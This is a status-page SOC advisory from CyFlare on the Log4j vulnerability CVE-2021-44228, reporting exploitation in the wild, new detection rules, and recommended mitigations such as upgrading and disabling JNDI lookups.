SOC ADVISORY - Critical Apache Log4j Vulnerability
Incident Report for CyFlare
Resolved
This incident has been resolved.
Posted Mar 01, 2022 - 09:57 EST
Monitoring
Dear Subscriber,

Yesterday, 12/10/2021, a critical zero-day vulnerability in Apache Log4j (CVE-2021-44228), a widely used Java logging library, is being leveraged by attackers in the wild – for now, fortunately, primarily to deliver coin miners.

The SOC is fully engaged in building a comprehensive threat advisory, threat hunting queries, and working with several clients on the matter affected by related exploitation attempts observed in their environments.

We will continue to hunt for related Indicators of Compromise throughout client environments and scan for the vulnerability within our clients that have the Vulnerability Management Service.

We can confirm that the Stellar Cyber – BDS platform’s IDS engine has been updated with new IDS signatures that would trigger security detections on exploitation attempts observed in network traffic.

In addition, the CyFlare SOC has also built its threat hunting queries & custom alarm (ATH) rule to trigger a security detection on exploit attempts. The rule has been enabled and successfully operationalized.

Customers of applications leveraging Apache log4j should upgrade to the newest version immediately.

Since the original patch was discovered to be bypassed, in the interest of implementing as many protections against this vulnerability as possible, the following mitigations are also recommended:
• Disable suspicious outbound traffic, such as LDAP and RMI on the server in PANW Firewall.
• Disable JNDI lookup.
o Remove the JndiLookup file in the log4j-core and restart the service.
o Setup spring.jndi.ignore=true

Reference Links:
https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
https://logging.apache.org/log4j/2.x/security.html
https://www.rapid7.com/blog/post/2021/12/10/widespread-exploitation-of-critical-remote-code-execution-in-apache-log4j/
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

Should you have any questions or concerns, please place a ticket with the SOC using socir@cyflare.com or call 877.729.3527 extension 2.

Thank you,
Your CyFlare SOC
Posted Dec 11, 2021 - 16:49 EST
This incident affected: Breach Detection Service.